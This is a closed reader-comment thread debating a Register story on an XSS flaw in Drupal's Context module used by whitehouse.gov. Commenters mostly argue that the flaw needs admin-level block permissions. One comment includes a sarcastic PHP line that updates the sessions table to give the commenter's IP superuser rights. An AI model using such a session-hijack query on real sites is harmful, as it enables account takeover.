back to article White House devs overlooked gaping Drupal vuln

A researcher has uncovered a potentially serious vulnerability in the open-source content management system used by the White House website and thousands of other sites. The XSS, or cross-site scripting, bug resides in the Drupal Context module, a plug-in that Whitehouse.gov and about 10,000 other sites use to manage how …

COMMENTS

This topic is closed for new posts.
  1. My Alter Ego
    Jobs Horns

    The OSS criticism has a point

    We have FreeBSD installed on several machines. If I come across issues I obviously check for existing fixes, if there are none (quite often) then I do my best to understand the problem and patch it. In an effort to "share the love", I always submit a patch to the project's maintainer, but more often than not I don't even get a response. Funnily enough, MySQL have the best record (at least with me).

    I've now got a documented list of patches I need to apply to a range of packages when upgrading, which is getting rather tedious.

    That said, at least it's all open source, so that I can patch issues rather than waiting for the vendor to do it for me.

    Evil Steve? It's the closest icon to Beastie.

  2. andb

    Poor journalism

    With a clear understanding how modern websites work, its very obvious that this is not an issue at all. Sites like Whitehouse.gov use a CMS to generate content, then actually serve static content from simple, hardened web servers. The public can't actually log in to anything running Drupal on a site like this. So there is frankly no way to exploit the "vulnerability". The Whitehouse IT department most likely understood the vulnerability, realized that it couldn't be exploited in their case and made the informed choice to use a release candidate module.

    To actually exploit this, someone would have to be on a Whitehouse internal network. They would also have to have an account with administrative privileges. If a user has this, there is probably already a lot of other things they can do to the site...

    Looking at Mr. Keane's "advisories" about Drupal security, most are things that an administrator can do to wreck his own site. It makes me wonder if he really can only attract attention to himself by spreading F.U.D.

    I'm disappointed with the Register for such poor journalism with clearly inadequate fact finding performed.

  3. Michael Cooper

    I wouldn't call it a huge vuln, nor easy to find

    I think that the article is a bit misleading in how it describes the bug as being easy to find and exploit.

    First off, it requires permissions to create blocks. This is typically a pretty high end permission. 9 times out of 10 I delegate this permission to *no one*. Even if one does allow other users to have this permission, they are typically content editors with control over overall site layout and structure. These users probably have all the access they'd need to do something malicious if they wanted to by virtue of their assumed position--or the ability to sit at your computer while you grab coffee or the boss calls you away.

    I'd agree with Knaddison that this is a pretty hard bug to exploit and that to exploit it, you would need someone who did not properly consider permissions access on their site to begin with--even so, it is certainly something that a user who didn't already have admin permissions could exploit.

  4. decibel.places
    Badgers

    ho hum

    XSS vulnerabilities are commonly and frequently found in contributed module code. They are usually plugged with a module update without any exploits.

    The Webform Report module was pulled from release for a very minor vulnerability, and has been fixed and reactivated. I kept 4 sites using the "vulnerable" version with no mishaps until the patched version came available.

    Compared to the Twitter followers bug, this is a minor problem and will be corrected through routine maintenance and code upgrades.

  5. drjango
    Thumb Down

    Misleading Article - Bad Journalism

    If you actually read the Advisory linked from this article (rather than author's very frivolous interpretation) you will see that it clearly states:

    "In order to execute arbitrary script injection malicious users must have 'Administer blocks' permission."

    Now, it's important to understand what this means. "Administer blocks" privilege is only ever given to the users with the highest administrative rights. No "guest" user or even simply registered user would ever have that, so as far as they are concerned - they can't do anything. Also, if you do have administrative rights of that level in any CMS, you can do way more damage than inject some javascript. There's no reason whatsoever to conclude that whitehouse.gov has a vulnerability, based on this advisory, yet the article not only suggest it, but also asserts the existence of one.

    This is bad journalism.

  6. nowarninglabel

    What a horrible article

    First of all, this is already fixed just hours later: http://drupal.org/node/795118

    Second of all, the chance of exploit is near 0% because it requires a privilege that is not normally assigned to non-administrative users. The idea that it was a vulnerability that could actually be exploited on whitehouse.gov is laughable at best, but is really just sensationalism at its worst.

    Third, the quote from Greg is obviously taken out of context. This problem was fixed right away, very easy to see the value of open source software there.

    Lastly, if the security researcher had followed the established guidelines of contacting the module maintainer before publicly exposing the vulnerability then there would have been no story here at all.

  7. Anonymous Coward
    Thumb Down

    This is just silly

    This is a whole lot of hype over nothing. Do you know how many people have the 'Administer blocks' permission required to exploit this XSS vulnerability? Probably about 4 people, all on the site's team. Guess what? If you give someone the keys to your car, they can change the tilt on your rear-view mirror, too! Someone was looking for an excuse to run a big headline. And oh, what's this? There's a new corrected version out already? Gotta love open source.

  8. the bat
    FAIL

    Trying to drum up a contract with the white house

    Trying to drum up a contract with the white house - why target the white house? why not CNN or someone else! that has to be someone crying over a job they lost because the White house didn't purchase the services!

  9. Jimmy Pop

    Terrible...

    Still.. I got a giggle.

    I love Drupal, and, as someone who has used/administered it, I have to agree with the other commentators who have derided the story originator's ability to think/read/etc.. and El Reg for blindly repeating it.

    But looking back a couple of years ago, before I'd heard of Drupal, I might have been suckered by a story like this.. its almost understandable...

    If you don't know what "Administer Blocks Permission" means.. (if your role has it, it lets you create chunks of page for the users (a block).. and you can put anything in those blocks and choose where they appear, in which theme, for whom etc, it lets you run php,javascript,html.. and runs in the context of the page, not the node, so has full rights to accounts/databases.. very powerful/flexible.. and obviously not for general or everyday use, and not only limited to XSS.. you could do anything)

    Perhaps reading the informative nodes on the drupal site would help in future.. some users are a tad fanatical! (and El Reg actually resembles a Zen Themed Drupal install.. lol, except for the Tranny DTD)

  10. Kevin Bailey

    Open source works again...

    As others have mentioned - create blocks privilege is not normally given to anyone apart from system admins. The Reg should have checked with a Drupal dev before running the article as it make El Reg look a bit sloppy on this one.

    The fact that this vuln is discussed and patches are available and the whole issue is in the open shows that OSS works as it should. No software is absolutely perfect - but at least OSS can get fixed quickly.

  11. Robert Carnegie Silver badge

    An exploitable vulnerabilty! I am shocked! Shocked!

    Why, those noodles at the White House must be as incompetent as Microsoft, Apple, or those lunkheads who made Linux! All of whom have released software with exploitable volnerabilities!

    Impeachment's not out of the question, you know.

  12. bell
    Thumb Down

    There is so much irresponsible going on here ...

    ... that it's just beyond funny. Starting with filing a full CVE vulnerability for a problem with release candidate software. File a bug against the module, contribute a patch if you're feeling constructive, there's no evidence of this problem being known and ignored for any period of time. The Drupal security team are perfectly within their rights to claim that it's only their problem if it's a release version. If that deprives the poor widdle researcher of his moment in the security advisory limelight, tough! No need to go proving the guy from Verizon right about narcissistic vulnerability pimps.

    El-Reg has also really failed to apply the critical analysis that we have come to expect. You were on the way there with your (simplified to the point of dubious accuracy) description of blocks. Just one or two more questions - following down the road of who gets the privilege by default and under what circumstances that group would grow - would have painted the whole story in a different light. Be a bit more careful about what you're biting ... please?

  13. Anonymous Coward
    Anonymous Coward

    no security audit... hmmm why not?

    Because from the sound of it the response would have been, "no don't put it on the interwebs, thats unsecure you know (justify my fee somehow - I have a CCNA)".

    I like security people, but plenty dig at me for being a OSS developer.

  14. Reg Sim
    Thumb Down

    Misleading Article - Bad Journalism

    "Because the vulnerability resides in a release-candidate module," - so its not a drupal bug per say.

    And as the other have gone a bit more technical about how it does not effect the white house, I can only presume this article is designed to bash open-source tools and products?

  15. Anonymous Coward
    Dead Vulture

    TheRegister overlooks gaping Credibility hole

    Is there an editor in the house?

    Would ElReg care to update the article, or respond to the comments, or remove the misleading "Gaping" from the title of the article?

    No? You'd rather just put misinformation in the featured articles bar on the homepage?

  16. Dan Goodin (Written by Reg staff)

    @Anonymous Coward

    For the record, "gaping" was used to suggest how easy it was for this bug to be spotted during a routine audit. A bug need not be easily exploitable for it to be extremely obvious.

    Given the ability for Drupal XSS's to silently reset the super user password, I think it's fair to say this bug should have been caught long ago. It wasn't, even after the White House developers gave themselves a big pat on the back for releasing their own code that built off the same buggy module.

    That's why the vuln is news and why The Reg stands by this story.

    Carry on.

  17. nicklewisatx
    WTF?

    Please...

    @Dan Goodin - tell me this, would anyone have been able to hack the whitehouse.gov with this information?

    Unless the whitehouse is full of loonies, the answer is clearly no.

    If anyone is hacked in this manner they are an idiot - plain and simple. Mere access to administering blocks could be exploited for both fun, and evil. If the register were a drupal site, your entire right sidebar is full of blocks. I could have a lot of fun: especially as a satirist who would want to make fun of your advertisers and sensationalist journalism.

    Consider this: In drupal core there is a module called "phpfilter" which is turned off by default and recommended against. If you had the php_filter module on... well, then I could do this too if I had permission to administer blocks:

    db_query("UPDATE {SESSIONS} SET uid =1 WHERE hostname = $MYIP");

    OMG THAT GIVES YOU ADMIN ACCESS! THE WHITE HOUSE HAS THAT MODULE DISABLED BUT WHAT DOES THAT SAY ABOUT THEIR SECURITY REVIEW?! lol Everyone call the newspapers! We have a serious story on our hands....

    You stand by the register, I stand by the Drupal Security team. They are top rate, while you sir are probably a nice guy, and could use better information to inform the angle you took on this story.

This topic is closed for new posts.